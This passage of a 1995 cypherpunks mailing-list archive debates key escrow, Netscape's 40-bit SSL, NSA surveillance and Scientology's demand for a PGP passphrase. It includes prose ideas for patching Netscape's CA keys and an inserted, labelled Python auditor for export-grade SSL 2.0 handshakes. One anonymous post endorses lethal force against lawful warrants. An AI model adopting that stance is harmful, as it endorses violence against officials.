early. Attendance was down visibly Thursday relative to the first day.

Pat

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMFBGEbCsmOInW9opAQEfQgP+P/P0MRGe3EOElzM0UPQy+xce0XGe3wex
gfQdTrGWhL+FbYt/7taj6jgtcRg9zih1yQ3W+kN/VUXY9J4I1b6dw+j0sb6MkCjT
pShnflDI5OPQmmUq9KZlmy50u2yXuBqfWSdXd9NypjDsh7XDrWIqvqIcuT1cc/di
quNZ3u7aymw=
=oJC7
-----END PGP SIGNATURE-----

p.s. please let me know if this one's pgp sig is better than yesterday's

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 7 Sep 95 21:50:51 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: <199509080450.GAA29735@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>,
bdavis@thepoint.net (Brian Davis) wrote:

>I, of course, know of the "dislike" of GAK here.  I am curious to know, 
>however, if the "dislike" is because government would have access under 
>any circumstances or if the primary worry is that government will cheat 
>and get access when most would agree that they shouldn't (either by the 
>judge "cheating" or a TLA stealing it).

Speaking only for myself, I would resist government access to my data or
property. Court ordered warrant or not. I firmly believe that the majority
of "lawful" acts the government in its various incarnations commits every
day is in violation of not only the US Constitution, but of the natural
rights given to me as part of my humanity. I therefore hold that I have
right, if not the duty, to resist these acts in any way possible, up to and
including the use of lethal force. The number of citizens who share this
opinion is growing every day.

--anon, due to the denouncement of the Bill of Rights by the criminals in
high office.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 8 Sep 95 08:43:59 PDT
To: remailer@bi-node.zerberus.de
Subject: No Subject
Message-ID: <9509081540.AA08797@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


How much you want to bet that a first copy goes to virginia?

Patrick

> 
> NY Times, Sept 8, 1995.
> 
> 
> Intel Wins Contract to Develop World's Fastest
> Supercomputer
> 
> By Lawrence M. Fisher
> 
> 
> San Francisco, Sept. 7 -- The Intel Corporation said
> today that it had won a contract from the Department of
> Energy to develop what it called the world's fastest
> supercomputer.
> 
> 
> The machine, to be built at an estimated cost of $45
> million, would use 9,000 of Intel's forthcoming P6
> microprocessors linked in a configuration known as
> massively parallel. In recent years, massively parallel
> computers using thousands of relatively inexpensive
> off-the-shelf chips have stolen the performance lead from
> traditional supercomputers like those made famous by Cray
> Research Inc., which use far fewer, but far more powerful
> processors.
> 
> 
> Intel said its new supercomputer would be the first to
> achieve the goal of calculating more than a trillion
> floating-point operations a second, known as a teraflop.
> The machine, to be kept at Sandia National Laboratories
> in Albuquerque, N.M., would be used by Department of
> Energy scientists to study a variety of complex problems,
> foremost among them nuclear weapons safety.
> 
> 
> "President Clinton is committed to ending underground
> nuclear testing," Victor Reis, Assistant Secretary for
> Energy Programs, said in a statement. "Computer
> simulation will be a principal means for insuring the
> safety, reliability and effectiveness of the U.S. nuclear
> deterrent. We are embarking on a 10-year program to
> advance the state of high performance computing to meet
> national security objectives," he said. ...
> 
> 
> ------
> 
> 
> 
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 09:11:00 PDT
To: Alan Horowitz <alanh@infi.net>
Subject: [NOISE] Re: Are booby-trapped computers legal?
Message-ID: <199509081610.JAA08664@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:52 PM 9/7/95 -0400, you wrote:
>I am pretty sure that it is lawful to use deadly force to protect 
>property, in New Mexico.

It's legal everywhere in the US - just some places make you contract
out the dirty work to guys in blue suits...

I agree with Sandy's comment that it makes much more sense to have
any boobytraps designed to destroy data, rather than kill intruders.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 8 Sep 95 09:12:45 PDT
To: cypherpunks@toad.com
Subject: Re:  GAK Hacks
Message-ID: <199509081611.JAA05733@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


It is interesting to see that the proposed solutions to avoiding GAK
hacks (URL:http://www.eskimo.com/~joelm/criteria.txt) largely revolve
around certificate restrictions.  Only keys signed with certificates from
accepted escrow agencies can be used, and there is a "root certificate"
used to authorize new escrow agencies.

This is similar to some of the restrictions in the widely used Netscape
web browser.  It only accepts certificates from a limited number of
agencies (actually only one which is public, the RSA spinoff
VeriSign).  This limitation is not based on escrow approval as in the
GAK papers, but it ends up with something of the same results:
interoperability with Netscape is only possible if you go through
approved channels.  And supposedly VeriSign does not make it too easy to
get a certificate if you are not a straight-arrow corporate type.

Maybe it would be good practice for a future GAK hack to try fixing these
problems with Netscape.  I could see two possibilities.

One would be to create a patcher which would let you change the set of
certificate authorities accepted by the browser.  Currently the browser
accepts at least one (an internal Netscape test CA) which is not needed
by end users.  Maybe its public key could be statically overwritten by
the patch program with the public key of the replacement CA.  This sounds
simple and safe.  The patch program can confirm that the data being
changed matches the test CA.

Another idea would be to patch the browser to emit full 128 bit SSL
rather than the crippled 40 bit SSL it currently creates.  This would be
trickier as it requires code changes, but they may not be as bad as it
seems.  The 40 bit SSL is actually calculated as 128 bits internally.
Then 88 bits are sent in the clear.  We would need to skip sending those
88 bits, and also change the transmitted bytes which encode which
encryption is being used.  This shouldn't be too bad as it mostly would
eliminate code or change some static values.  The one thing I am unsure
of is whether the 40 bit version sends the entire 128 bit SSL key in the
RSA encrypted data (88 bits of which would be redundant, also being sent
in the clear) or whether it sends only the 40 bits RSA encrypted.  If the
latter it would be somewhat more work to do the patch because now a
larger value will have to be packed into the RSA record.  If it is sending
the 128 bits all the time then the patch would be much easier.

This second patch is more advantageous for end users as it allows them to
have strong encryption rather than the weak 40 bits which we have been
breaking.  The first would be a more direct demonstration of the
difficulties of using certificate restrictions to limit functionality.

The criteria.txt paper suggests checksumming the cryptographic routines
to prevent patches like this, but generally I think such checksums can be
defeated pretty easily.  I doubt that Netscape currently has any such
thing, though.

Netscape says they will allow some form of user specification of
certificates in a future version of the browser, but they have been
saying this for quite some time and still it is not here.

Hal
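
[Added example, not part of Hal's message and not Netscape code.] The 128-bit key with 88 bits sent in the clear, as it appears on the wire: a parser for the SSL 2.0 CLIENT-MASTER-KEY message that flags export-grade key exchanges in captured handshakes. The field layout and CIPHER-KIND values are taken from the SSL 2.0 specification as an assumption of this example; in that layout only the secret part of the master key is RSA-encrypted. The sample records are constructed.

```python
import struct
from dataclasses import dataclass

# CIPHER-KIND (3 bytes) -> (name, MASTER-KEY length in bits).
# Values assumed from the SSL 2.0 specification, not from the post above.
CIPHER_KINDS = {
    0x010080: ("RC4_128_WITH_MD5", 128),
    0x020080: ("RC4_128_EXPORT40_WITH_MD5", 128),
    0x030080: ("RC2_128_CBC_WITH_MD5", 128),
    0x040080: ("RC2_128_CBC_EXPORT40_WITH_MD5", 128),
    0x050080: ("IDEA_128_CBC_WITH_MD5", 128),
    0x060040: ("DES_64_CBC_WITH_MD5", 64),
    0x0700C0: ("DES_192_EDE3_CBC_WITH_MD5", 192),
}
MSG_CLIENT_MASTER_KEY = 2


@dataclass
class MasterKeyInfo:
    cipher: str
    clear_bits: int      # sent unencrypted in CLEAR-KEY-DATA
    secret_bits: int     # the only part protected by the server's RSA key
    encrypted_len: int   # size of ENCRYPTED-KEY-DATA in bytes
    export_grade: bool


def parse_client_master_key(record: bytes) -> MasterKeyInfo:
    """Parse one SSL 2.0 record that carries a CLIENT-MASTER-KEY message."""
    if len(record) < 2 or not record[0] & 0x80:
        raise ValueError("expected a 2-byte SSL 2.0 record header")
    body_len = ((record[0] & 0x7F) << 8) | record[1]
    body = record[2:]
    if len(body) != body_len:
        raise ValueError("record length mismatch")
    if len(body) < 10 or body[0] != MSG_CLIENT_MASTER_KEY:
        raise ValueError("not a CLIENT-MASTER-KEY message")
    kind = int.from_bytes(body[1:4], "big")
    clear_len, enc_len, arg_len = struct.unpack(">HHH", body[4:10])
    if 10 + clear_len + enc_len + arg_len != len(body):
        raise ValueError("field lengths do not add up")
    if kind not in CIPHER_KINDS:
        raise ValueError(f"unknown CIPHER-KIND 0x{kind:06x}")
    name, key_bits = CIPHER_KINDS[kind]
    exportable = "EXPORT40" in name
    # Export kinds keep 40 bits secret; every other kind sends nothing in clear.
    expected_clear = key_bits - 40 if exportable else 0
    if clear_len * 8 != expected_clear:
        raise ValueError(
            f"{name}: {clear_len * 8} clear bits, expected {expected_clear}")
    return MasterKeyInfo(name, clear_len * 8, key_bits - clear_len * 8,
                         enc_len, exportable)


def audit(records):
    """Return (index, verdict, detail) for every weak or malformed record."""
    findings = []
    for i, rec in enumerate(records):
        try:
            info = parse_client_master_key(rec)
        except ValueError as exc:
            findings.append((i, "MALFORMED", str(exc)))
            continue
        if info.export_grade:
            findings.append((i, "EXPORT",
                             f"{info.cipher}: {info.secret_bits} secret bits, "
                             f"{info.clear_bits} sent in the clear"))
    return findings


def build_record(kind: int, clear_len: int, enc_len: int = 64) -> bytes:
    """Constructed test input: filler key bytes, 512-bit RSA block, no KEY-ARG."""
    body = bytes([MSG_CLIENT_MASTER_KEY]) + kind.to_bytes(3, "big")
    body += struct.pack(">HHH", clear_len, enc_len, 0)
    body += bytes(range(clear_len)) + b"\xEE" * enc_len
    return bytes([0x80 | (len(body) >> 8), len(body) & 0xFF]) + body


# Constructed samples: export RC4, full-strength RC4, and an inconsistent
# record that names a full-strength cipher but still exposes 88 key bits.
SAMPLES = [
    build_record(0x020080, 11),
    build_record(0x010080, 0),
    build_record(0x010080, 11),
]

if __name__ == "__main__":
    for finding in audit(SAMPLES):
        print(finding)
```
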




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arve Kjoelen <akjoele@shiva.ee.siue.edu>
Date: Fri, 8 Sep 95 07:12:45 PDT
To: yihchun@u.washington.edu
Subject: Re: ON OFF-TOPIC
Message-ID: <199509081412.JAA05507@shiva.ee.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995 yihchun@saul3.u.washington.edu wrote:

> > Poor you, the only major political party to come out with a pro crypto 
> > statement is a socialist party.

>I think the libertarian position is inherently pro-crypto.
>Besides, the French are socialist, and well, as far as crypto goes...

Wrong!  First of all, Jacques Chirac (French President) and the majority of
the French parliament are conservatives.  Secondly, a statement like
"the French are Socialist" is an (untrue) generalization.  You are probably
thinking of Francois Mitterrand ("socialist"), who became French
President in the 80's, and the first French Socialist President ever.

Chirac, by the way, is the genius behind the recommencement of 
Nuclear testing in French Polynesia.

"Test them in France if there's no risk of radioactive leakage"

-Arve Kjoelen
Southern Illinois University at Edwardsville




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 8 Sep 95 06:39:02 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Cypher Rant II: Why Private Cryptography should not be regulated.
In-Reply-To: <30502bf1.flight@flight.hrnowl.lonestar.org>
Message-ID: <Pine.PMDF.3.91.950908093640.539028880H-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


forgive me for the advertisement, but I *am* a lawyer, and I think this 
well-intentioned rant gets some stuff wrong.  If you want to know why I 
think this, visit my homepage and follow the link to my Clipper paper.
Please note the homepage is a bit mobile right now; this address is 
temporary, but the next one should be stable.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 8 Sep 95 07:27:03 PDT
To: cypherpunks@toad.com
Subject: Jimmy Upton's T-shirt (NIST's 9/6-7/95 meetings)
Message-ID: <9509081402.AA09452@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


The meetings included break-out groups, each of which had a moderator (mine
was from NSA -- were they all?) and each of which had a recorder who would
then report to the entire assembled group.

Jimmy was a recorder once -- one of the last to report on the second day.
Nearly every person speaking from industry started his remarks with the
same disclaimer:

	My comments on these criteria should not be taken as
	an endorsement of the concept of key escrow

Jimmy Upton, rather than start his report with that disclaimer, suggested
that perhaps we should have T-shirts made for conference attendees stating:
"My comments on these criteria...."  The crowd broke up in laughter and
applause.

Speaking of applause -- the assembled audience was relatively passive
through most of the presentation -- but whenever someone expressed
opposition to the whole concept of GAK, the entire auditorium applauded.
Specifically -- I was sitting near the civil liberties group (ACLU, EPIC,
VTW, ...) and they applauded but it came from all over the auditorium.
There were some who didn't -- the gov't folks, a few industry folks, ....

 - Carl

P.S.  I've put a few additions on my home page, in response to this
meeting.



 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Sep 95 07:55:26 PDT
To: cypherpunks@toad.com
Subject: Darren Reed: Re: NSA and the Internet.
Message-ID: <199509081455.KAA07149@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded from com-priv. Anyone out there have information they can
use to confirm or deny any of this?

.pm

------- Forwarded Message

From: Darren Reed <avalon@coombs.anu.edu.au>
Subject: Re: NSA and the Internet.
To: com-priv@lists.psi.com
Date: Fri, 8 Sep 1995 17:36:11 +1000 (EST)

Now that I've got it next to me...
 
> I was reading a journal recently which mentioned the NSA were taking
> an active role in monitoring the network at key points, such as FIX
> East and West and MAE East and West.  Can anyone comment on this (if
> they're allowed :) ?
[...]

To name some more names mentioned as being NAPs under surveillance:
Pennsauken, NJ (Sprint); Chicago (AmeriTech/Bell Comms. Research);
San Francisco, CA (Pacific Bell); CIX, CA (San Jose); SWAB, North Virginia
(Bell Atlantic).

There is a rather worrying quote in the article about NASA capturing data
for the NSA.

The column closes with a comparison to a case where the NSA was almost
prosecuted by the US Justice Dept. in the '70s for anti-Vietnam War
group surveillance.

The article appeared in "Computer Fraud & Security", June 1995.
American editor is:
Charles Cresson Wood
Information Integrity Investments
Sausalito, CA, USA
The article in question, titled
"Puzzle Palace Conducting Internet Surveillance" is by Wayne Madsen of
Virginia.  No Internet E-mail address listed for either of the American
contributors mentioned above.

darren


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 09:16:08 PDT
To: modemac@netcom.com (Modemac)
Subject: Re: Scientology tries to break PGP - and fails?
Message-ID: <9509081615.AA03382@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Modemac writes:
>  Yet it seems that despite all their efforts to get what they want,
>  they can't break PGP - so they have to force Wollersheim to reveal
>  the key.
>  Mr. Wollersheim has stated that he will go to jail before he reveals
>  his encryption key.
[...snip...]
>  Call this one: BIG WIN FOR PGP!

Could this be it?  The test case for forced key disclosure?  The  
Scientologists seem very determined and already have a grudge against  
Wollersheim (according to a web page I saw Co$ owes him several million from  
a settlement).  Has Co$ filed against Wollersheim over this yet?

If this does go to court and forcing Wollersheim to reveal the key becomes a  
central issue, is this the test case "we" want?  Is this a "BIG WIN FOR PGP!"  
or not?

I can think of worse cases for this to come up in.  I.E. a four horseman  
case.  Here the party seeking forced disclosure of the key (Co$) is  
presumably already held in low esteem by much of the public (IMHO).  I  
suppose how this will play in the media, if at all, depends on what the  
"church" thinks Wollersheim has hidden in his encrypted data files.

It seems that the US media hasn't picked up much on the Scientology debacle  
yet... or am I wrong?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 8 Sep 95 08:25:37 PDT
To: cypherpunks@toad.com
Subject: Re: Darren Reed: Re: NSA and the Internet.
Message-ID: <9509081524.AA09579@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I stopped reading com-priv a year+ ago.  One of the "gadflies"
back then (name escapes me -- one of the journalists, I think, but
not Gordon Cook) said that at least the NJ NAP was moved at the last
minute.  He had proof of that.  I don't remember that he had proof that
it was moved at NSA request, although that was his claim.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Sep 95 08:51:30 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: No Subject
In-Reply-To: <9509081540.AA08797@cantina.verity.com>
Message-ID: <199509081551.LAA07222@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Patrick Horgan writes:
> How much you want to bet that a first copy goes to virginia?

I'm not sure that the NSA actually would want machines on that scale
these days. It's probably a lot more economical to throw your money
into lots of much smaller machines and occasionally link them up via
networks. Unlike physics simulation problems, most crypto problems
don't involve tight communication between the parallel processors, so
the extra expense that the high speed buses represent would end up
being a waste.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 09:55:01 PDT
To: trollins@hns.com (Tom Rollins)
Subject: Re: Scientology tries to break PGP - and fails?
Message-ID: <9509081654.AA03407@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Tom Rollins writes:
>  If this is the file that the Co$ is trying to crack, then what the
>  is being asked for is a pass phrase that can be handed to the Co$
>  that will pass the PGP valid key check and still not decrypt the
>  data to anything useful.

Well, I don't have the PGP 'conventional' encryption format memorized, but  
there is probably a constant after the IV that is prepended to the data.  The  
constant is used to determine if the key is correct.  Since the conventional  
encryption runs in CFB mode and there is a full block of random IV at the  
beginning of the file, it is extremely unlikely that a key could be found  
that would properly decrypt only the first two blocks while leaving the rest  
unreadable...

>  If Larry Wollersheim does have the valid key.  It would be a simpler
>  process to know what fake key to use and work it backwards through
>  the MD5 to arrive at an ascii string to produce the fake key.

Not really.  Even if you could find an IDEA key that would produce the  
desired output it would be hard to find a passphrase that would produce that  
key when hashed.  One of the properties of one-way hash functions is that it  
is difficult to find a plaintext that produces a given hash.  Hence the term  
'one-way'....  Even if you did find a passphrase (which, if MD5 is strong,  
would require something like 2^64 operations), it would likely be long, have  
8-bit chars, and would be impossible to type in.  It would be tough to  
convince anyone that it was the real passphrase.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 10:05:58 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: GAK Hacks
Message-ID: <9509081705.AA03422@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>  One would be to create a patcher which would let you change the
>  set of certificate authorities accepted by the browser.  Currently
>  the browser accepts at least one (an internal Netscape test CA)
>  which is not needed by end users.  Maybe its public key could be
>  statically overwritten by the patch program with the public key of
>  the replacement CA.  This sounds simple and safe.  The patch program
>  can confirm that the data being changed matches the test CA.

This is an excellent idea, assuming the new CA's key will fit in the same  
amount of space or less than the test CA.  How big is the test key?

Of course, Netscape could decide to remove the test CA certificate from  
future versions of the browser.  However, you could probably replace the  
Verisign certificate with your CA certificate and then have your CA sign the  
Verisign certificate so the browser can still use both.  :-)

>  This second patch is more advantageous for end users as it allows
>  them to have strong encryption rather than the weak 40 bits which
>  we have been breaking.  The first would be a more direct demonstration
>  of the difficulties of using certificate restrictions to limit
>  functionality.

I don't think this is necessary as domestic versions of Netscape have already  
been exported and are available on non-U.S. FTP sites...

>  The criteria.txt paper suggests checksumming the cryptographic
>  routines to prevent patches like this, but generally I think such
>  checksums can be defeated pretty easily.  I doubt that Netscape
>  currently has any such thing, though.

It only makes it harder to patch.  Anyone with a clue knows that there is no  
such software-only protection that can't be defeated.  Even hardware/software  
dongle type protection can be defeated by altering the software to not check.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@hns.com (Tom Rollins)
Date: Fri, 8 Sep 95 09:22:24 PDT
To: modemac@netcom.com (Modemac)
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <199509080312.UAA03808@netcom15.netcom.com>
Message-ID: <9509081620.AA19816@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


> 
> News Flash!
> 
> According to an informed source, the so-called "church" of Scientology is
> trying to force Larry Wollersheim to give them his de-encryption code for
> PGP. 
> 
> Larry Wollersheim is the director of FACTNet, a Colorado BBS that 
> specializes in distributing information about religious cults - 
> especially the Church of Scientology.  Scientologists raided FACTNet 
> recently and seized its hardware and records recently, in a case that has 
> spread news of the Scientology wars all over the Internet.
> 
> Scientology has been in possession of Larry Wollersheim's computer 
> records for quite a while now - at least three weeks, I believe.  They 
> have been scanning it for what they claim to be "copyright violations."  
> Yet, their list of scanning criteria also includes a list of 34 names of 
> their critics and enemies, including a famous Netizen named "Rogue Agent."
> 
> Yet it seems that despite all their efforts to get what they want, they 
> can't break PGP - so they have to force Wollersheim to reveal the key.
> 
> Mr. Wollersheim has stated that he will go to jail before he reveals his 
> encryption key.
> 
> Please forward this note to all interested parties.
> 
> Call this one: BIG WIN FOR PGP!
> 
> For more information on Scientology's war against the Internet, read the 
> many Web pages set up to cover the story.  My own page, an "Introduction 
> to Scientology," is:
> 
> 	http://www.tiac.net/users/modemac/cos.html
> 
> It includes a link to the FACTNet Web page, as well as Ron Newman's 
> famous Web page: "The Church of Scientology vs. the Net."
> 

I took a look at the FACTNet web page.  There is a file encrypted with
PGP using the "-c" option.  They are asking for people to help guess
the Pass Phrase.  Why would anyone bother if they had no clue that the
file contained anything 'interesting'?

If this is the file that the Co$ is trying to crack, then what the
is being asked for is a pass phrase that can be handed to the Co$ that
will pass the PGP valid key check and still not decrypt the data to
anything useful.

If Larry Wollersheim does have the valid key.  It would be a simpler
process to know what fake key to use and work it backwards through
the MD5 to arrive at an ascii string to produce the fake key.

Too bad this wouldn't be plausible for the secret ring.  Perhaps PGP
needs an option to specify the key in Hex and make the process easy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 10:35:59 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Hacking banking (fwd)
Message-ID: <9509081735.AA03442@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


David Wiesner writes, in a message forwarded by Brad Dolan:
>  "Already, Fuentes said, federal authorities in New York are
>  investigating whether programmers hired to write software for a
>  financial institution may have left a 'back door' open in the
>  program, one through which money may have been diverted to foreign
>  bank accounts."
>  Does anyone know what this federal investigation in New York is
>  about?   How about copying this note around and seeing what people
>  can find out?

Perhaps this is related to the recent Citicorp (Citibank?  I have trouble  
keeping up...) job done by the people in Russia?

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 8 Sep 95 03:43:12 PDT
To: cypherpunks@toad.com
Subject: Re:(changed) Criminals and Crypto
In-Reply-To: <199509080406.AAA25183@kanga.INS.CWRU.Edu>
Message-ID: <Pine.HPP.3.91.950908121557.26441A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Tobin T Fricke wrote:

> I think that is a good point.  Of course, if all non-escrowed
> encryption techniques were made illegal, then the criminals would
> just have another broken law under their belt if they used
> strong encryption.  After all, an outlaw is an outlaw because
> he has broken laws, so what sense does it make to make more
> laws for him to break?  Hmph.  

Exactly. As someone recently pointed out, the practical result
would only be to define a new class of single-crime criminals
(cypherpunks/cyphercriminals).

In my .se perspective this is emphasized by our penalty system.
In the foreseeable future (10 years?) they would never get away
with a harsher penalty for using un-GAKed crypto than a moderate
fine. To 'real' criminals, who usually don't have open assets to
forfeit (and the current praxis is then to forget about it after
a few years) and no reputation as law-abiders to defend, it would
be a joke, of course.

Mats 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Fri, 8 Sep 95 05:50:40 PDT
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Cypher Rant II: Why Private Cryptography should not be regulated.
Message-ID: <30502bf1.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

CypherRant V2: Reasons why private cryptography should not be regulated.
 
Paul Elliott is solely responsible for this document.
Please distribute widely.
 
 
FBI director Freeh has been going around pushing his stupid plans
for cryptography regulation. Usually, these plans take the form of
some kind of mandatory key escrow. Mandatory key escrow schemes
are requirements that encryption keys be given to government agencies
with the promise that the keys will not be used without a warrant.
 
Now let me give some reasons why Freeh's requests should be ignored.
 
1) It is unconstitutional!
	a) First amendment. Electronic communications are a form
                of speech and the cryptography regulations try to regulate
                this speech to a form the government understands.
                Congress shall make  NO LAW ....or abridging the
		freedom of speech or of the press; ... 
		They really meant it!
	b) Second amendment. Cryptography is arms. Even U.S.
                government ITAR regulations admit this. Therefore
                cryptography is protected by Second amendment.
	c) Ninth & tenth amendments. Article I section 8 does not
                give congress the power to tell us what computer
                software we can run on our computers. Therefore
                that power remains with us, and we should be able
                to run whatever cryptography software we want the 
                displeasure of congress not withstanding.
	d) The power to search, if a warrant exists, which is mentioned by
		the fourth amendment, does not grant the government the 
		right to succeed in finding what the it is looking for. 
		In other words the power to search, is not a power to 
		guarantee a successful search. It is not a power to 
		require citizens to run their lives in such a manner 
		that any government search will be successful. For 
		more information on this, see the following World Wide 
		Web url: http://www.clark.net/pub/cme/html/avss.html
 
Since all Senators and Congressmen take an oath to preserve and defend
the constitution of the U.S., this should be the end of the argument.
However, watching some of the stupid laws that have come out of congress
in past years, tells me I should supplement the above with additional
argument.
 
I am not a lawyer and I am not trying to be one. I have no opinion as to
whether private cryptography regulations will be found unconstitutional.
There are a number of cases where out courts have made decisions which
do great violence to the plain meaning of the text of our constitution.
Knowing what the courts will actually do is the business of lawyers.
Understanding the constitution so that one may know what the courts 
should do should be the business of every citizen.
 
2) The excellent NRA argument "when guns are outlawed only outlaws
will have guns" applies with equal force to cryptography! Professional
criminals will circumvent with ease any government regulations on
cryptography. Billions of bytes travel the internet yearly. The techniques
of steganography make it absolutely trivial for any motivated person to 
conceal any encrypted messages. The Big Brother cryptography regulations
will affect only ordinary citizens.
 
3) Cryptography is already in use by legitimate business. Any government
regulation of cryptography will probably cost huge amounts of money for
software and hardware costs for existing systems to be changed to a form
that the government approves. The existing ITAR regulations probably
cost the U.S. economy large amounts of money because U.S. companies can
not market cryptography software internationally. For information, see: 
http://www.eff.org/pub/Crypto/ITAR_export/tis_walker_export_101293_hr.testimony

By discouraging private cryptography, the ITAR regulations probably
enables a large amount of computer crime since it makes it difficult for
people to protect themselves. The ITAR regulations have not and can not
prevented strong cryptography from making it outside  the U.S. How many
tons of cocaine illegally enter the U.S. every year? Yet the government
ITAR regulations propose to regulate the export of software that can fit
in a shirt pocket, or travel by wire concealed with  billions of bytes
of data that leave the U.S. every year. It is time for the U.S.
government to start living in the real world!
 
According to an article in the August 17, 1995 Wall Street Journal, ITAR
regulations have required Netscape to use inferior encryption methods in
the international version of its World Wide WeB browser software. This
inferior encryption method has actually been broken by a French Hacker!
Because of its computational intensity, this weakness in the encryption
method does not represent an immediate danger. However as more powerful
computers continue to develop, this and similar vulnerabilities will
present a danger for those who wish to use the internet for commerce.
For more information, see:
http://pauillac.inria.fr/~doligez/ssl/
 
4) These regulations make it impossible for an individual to have
greater privacy than the U.S. government. The Adlrich Ames case makes it
clear that the U.S. is incompetent to keep a secret. 
 
5) The proposed regulations require the American people trust the
government, but on the contrary, the government should be required to
trust the American people. Recent news stories (Waco ect.) make  it
clear that it is common for government agents to lie to get a search 
warrants. Government should be viewed as George Washington did as  "a
fearful servant and a dangerous master".
 
A recent poll conducted by the Americans Talk Issue Foundation said 76%
of the people questioned responded that they rarely or never trust
"government to do what is right". This mistrust is well founded.  At the
same time as administration sources were saying that key escrow schemes
would remain voluntary, FBI, NSA, and DOJ experts were saying that the
schemes must be made mandatory if they were to be at all effective. If
the government is willing to lie to establish a key escrow key system,
what makes us believe that the government will not lie when applying for
warrants to use that system? For more information on this, see:
http://www.efh.org/pgp/fbilie.html
 
If any key escrow system is adopted, the secret FISA court will
undoubtedly be given the power to issue  warrants for decryption keys.
